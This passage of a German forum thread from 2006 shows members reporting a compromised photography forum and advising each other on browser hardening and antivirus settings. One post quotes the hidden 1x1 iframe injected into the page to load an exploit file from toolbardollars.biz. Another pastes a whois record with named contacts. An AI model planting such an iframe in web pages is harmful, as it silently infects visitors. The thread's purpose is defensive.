RE: Virus durch Forum?

#121 von matthiaspaul , 23.01.2006 15:16

Achtung, liebe Minolta-Fans!

Das Forum hat leider wieder einen Trojaner abbekommen. Das muß irgendwann
im Laufe des Vormittags passiert sein. Ich bekomme hier beim Aufruf des Forums
mehrere Virenwarnungen von H+B EDV AntiVir:

XPLADV553.WMF enthält Signatur des Exploits EXP/MS06-01.WMF
von toolbardollars.biz

CACNFBM4.HTML enthält Signatur des Exploits EXP/JS.CVE2005-1790j

SPLOITADV553.ANR enthält Signatur des Exploits EXP/MS05-002.Ani.A

Das Ganze passiert nur beim Zugriff auf das Forum.

Ganz oben auf der Hauptseite gibt es im Quelltext einen versteckten IFRAME:

1
 
<iframe src="http://toolbardollars.biz/dl/adv553.php" width=1 height=1></iframe>
 



der den Müll offensichtlich einschleust.

Wie schon weiter oben in diesem Thread beschrieben, solltet ihr ActiveX-Controls,
ActiveScripting (JavaScript, JScript, Java und ähnlichen Kram), PlugIns und
.NET- Komponenten abschalten, den Link auf "http://minolta-forum.de" ggfs.
aus der Zone für "vertrauenswürdige Sites" rausholen, Cookies und den Cache
für Web-Seiten komplett löschen, den Virenscanner aktualisieren und den
Online-Scanner so konfigurieren, daß er ausnahmslos alle Dateien scannt,
auf die zugegriffen wird (also auch "nicht ausführbare" Dateien). In Anbetracht
der Welle von. WMF-Exploits solltet ihr, sofern ihr mit Microsoft-Systemen
arbeitet, unbedingt alle aktuellen Updates von Microsoft Update einspielen.
Da hat es vor etwas über einer Woche sehr wichtige Sicherheits-Updates
gegeben.

Viele Grüße,

Matthias



matthiaspaul  
matthiaspaul
Beiträge: 14.595
Registriert am: 08.06.2004


RE: Virus durch Forum?

#122 von fwiesenberg , 23.01.2006 15:18

/sad.gif" style="vertical-align:middle" emoid="" border="0" alt="sad.gif" />
Bei mir sieht's ähnlich aus.
Der Trojaner versucht auf die Site 81.9.5.9 zuzugreifen.



 
fwiesenberg
Beiträge: 10.065
Registriert am: 03.11.2004


RE: Virus durch Forum?

#123 von fwiesenberg , 23.01.2006 15:25

Schönen Gruß aus Rußland!

RIPE lokalisiert die angegebene Adresse dort:

ZITATinetnum:        81.9.5.0 - 81.9.5.255
netname:        ELTEL
descr:          SPB Network
country:        RU
admin-c:        SA507-RIPE
tech-c:          AG12797-RIPE
status:          ASSIGNED PA
mnt-by:          ELTEL-RIPE-MNT
source:          RIPE # Filtered
person:          Sablina Alexandra
address:        10N, 65-67,
address:        Chaykovskogo st.
address:        191123 Saint-Petersburg
address:        Russia
phone:          +7 812 4381102
fax-no:          +7 812 4381101
e-mail:          angel@eltel.net
nic-hdl:        SA507-RIPE
mnt-by:          ELTEL-RIPE-MNT
source:          RIPE # Filtered
person:          Alexandr Goussev
address:        10N, 65-67,
address:        Chaykovskogo st.
address:        191194 Saint-Petersburg
address:        Russia
phone:          +7 812 4381102
fax-no:          +7 812 4381101
e-mail:          alex@eltel.net
nic-hdl:        AG12797-RIPE
source:          RIPE # Filtered[/quote]



 
fwiesenberg
Beiträge: 10.065
Registriert am: 03.11.2004


RE: Virus durch Forum?

#124 von ingobohn , 23.01.2006 15:35

Witzigerweise habe ich das problem wieder mal nur mit dem IE6. Firefox 1.5 geht einwandfrei...



ingobohn  
ingobohn
Beiträge: 11.247
Registriert am: 03.11.2003


RE: Virus durch Forum?

#125 von Michael H , 23.01.2006 15:42

Vielleicht erkennt ja Firefox, daß ein IFRAME im Header völlig sinnlos ist und holt die Seite erst gar nicht. Ich habe die Seite trotzdem mal geblockt.

Langsam sollten sich die Admins mal Sorgen um die Einbruchssicherheit auf dem Server machen...



Michael H  
Michael H
Beiträge: 2.167
Registriert am: 28.03.2005


RE: Virus durch Forum?

#126 von Gelöschtes Mitglied , 23.01.2006 15:48

Zitat von ingobohn
Witzigerweise habe ich das problem wieder mal nur mit dem IE6. Firefox 1.5 geht einwandfrei...


Es ist schon was da. Schau mal ganz links oben, oberhalb des Logo ist ein ganz kleines Kästchen. /sad.gif" style="vertical-align:middle" emoid="" border="0" alt="sad.gif" />

Gruss
Peter




RE: Virus durch Forum?

#127 von optical , 23.01.2006 15:51

Das empfehlenswerte Tool "Adblock" für Firefox erkennt das IFRAME automatisch und blockt es, mit einem weiteren Klick kann man einen Filter auf "http://toolbardollars.biz/*" setzen.



optical  
optical
Beiträge: 596
Registriert am: 22.11.2004


RE: Virus durch Forum?

#128 von Seppel , 23.01.2006 15:54

Bei mir gabs auch Alarm, aber wenn ich mich nicht irre erst beim Speichern eines Cookies. Browser ist Opera. Hier der Alarm:

23.01.2006,14:57:21 [WARNUNG] Enthält Signatur des Exploits EXP/MS06-01.WMF!
C:\DOKUMENTE UND EINSTELLUNGEN\...\ANWENDUNGSDATEN\OPERA\OPERA\PROFILE\CACHE4\OPR0J0Q5.WMF
[INFO] Die Datei wurde gelöscht!

23.01.2006,14:57:30 [WARNUNG] Enthält Signatur des Exploits EXP/JS.CVE2005-1790j!
C:\DOKUMENTE UND EINSTELLUNGEN\...\ANWENDUNGSDATEN\OPERA\OPERA\PROFILE\CACHE4\OPR0J0Q6.HTM
[INFO] Die Datei wurde gelöscht!



Seppel  
Seppel
Beiträge: 320
Registriert am: 15.08.2004


RE: Virus durch Forum?

#129 von klaga , 23.01.2006 15:59

Firefox läuft normal /good.gif" style="vertical-align:middle" emoid="" border="0" alt="good.gif" />
Opera wollte den Trojaner laden MCA hat ihn geblockt und gelöscht.
Die Gatesbazillenschleuder werfe ich erst gar nicht an /cool.gif" style="vertical-align:middle" emoid="" border="0" alt="cool.gif" />



klaga  
klaga
Beiträge: 3.381
Registriert am: 12.07.2003


RE: Virus durch Forum?

#130 von acoustic_soma , 23.01.2006 16:03

Jetzt geht man einmal aus dem Haus und lässt den Computer unbewacht...

Ich wurde beim heimkommen auch erstmal mit einer Latte Warnungen von AntiVir überhäuft, jetzt ist aber wieder verdächtig still.

Wurde das Problem schon gefixt?

Gruss Alex



 
acoustic_soma
Beiträge: 446
Registriert am: 26.12.2003


RE: Virus durch Forum?

#131 von Shima No ( gelöscht ) , 23.01.2006 16:26

IE 6.0 verucht, eine Datei namens XPLADV553[1].wmf zu öffnen, Kasperky Antivirus verhindert das.

Problem besteht also noch.

mfg
Shima No.



Shima No

RE: Virus durch Forum?

#132 von AxelF , 23.01.2006 16:42

Huijuijui,

also bei mir unter Firefox wird das Kästchen angezeigt. Sonst ist alles ruhig.

Unter IE6SP1 kommt gleich die große Alarmglocke:

F-Secure meldet sofort einen Virus. Dann kommen noch mehrere Skript-Eingabeaufforderungen mit kryptischen Zeichen und zu guter Letzt blockiert der Explorer noch den Download irgendeiner Datei.

Leid tun mir an dieser Stelle wirklich die User ohne Virenschutz und ohne aktualisierten Browser.

Gruß
Axel



 
AxelF
Beiträge: 433
Registriert am: 11.11.2003


RE: Virus durch Forum?

#133 von Holger_Schmitz , 23.01.2006 16:51

Ehrlich gesagt brauchen diese User einem nicht Leid zu tun, mittlerweile ist es allgemein bekannt daß das Internet ein Swingerclub der Viren ist und ungeschützt betritt man so etwas nicht (wie im realen Leben ja auch /blink.gif" style="vertical-align:middle" emoid="" border="0" alt="blink.gif" /> ).

Gruß
Holger



Holger_Schmitz  
Holger_Schmitz
Beiträge: 241
Registriert am: 28.11.2004


RE: Virus durch Forum?

#134 von AxelF , 23.01.2006 17:03

Swinger-Club, soetwas habe ich noch nie betreten und habe es in der nächsten Zeit auch nicht vor. Von daher weiß ich auch nicht, wie man sich dort kleidet oder auch nicht. ;-)

Zum Thema leid tun. Es gibt heute immer noch viele (meistens ältere) technisch unversierte Menschen, so z.B. meine Eltern und Schwiegereltern, die zwar schon das Wort Virus gehört haben, sich mit dem Schutz aber nicht wirklich auskennen. Die sind schon froh, wenn der Computer läuft und am Ende das macht, was sie wollen ... will sagen, dass Sie die Kiste so bedienen können, wie die Software es will. Wenn dann nicht der (Schwieger-, nicht Swinger-)Sohn oder eine andere dritte Person helfend eingreift, dann sind diese Menschen aufgeschmissen und völlig ohne Schutz. Von daher tun mir diese Menschen schon leid, denn "sie wissen nicht was sie tun!"

Gruß
Axel



 
AxelF
Beiträge: 433
Registriert am: 11.11.2003


RE: Virus durch Forum?

#135 von magro , 23.01.2006 17:20

... bei mir war er auch - Norton hat ihn erkannt und gelöscht. /rolleyes.gif" style="vertical-align:middle" emoid="" border="0" alt="rolleyes.gif" />



magro  
magro
Beiträge: 67
Registriert am: 01.03.2005


   


  • Ähnliche Themen
    Antworten
    Zugriffe
    Letzter Beitrag
| 2002- © so-fo.de | minolta-forum.de |
Xobor Einfach ein eigenes Forum erstellen
Datenschutz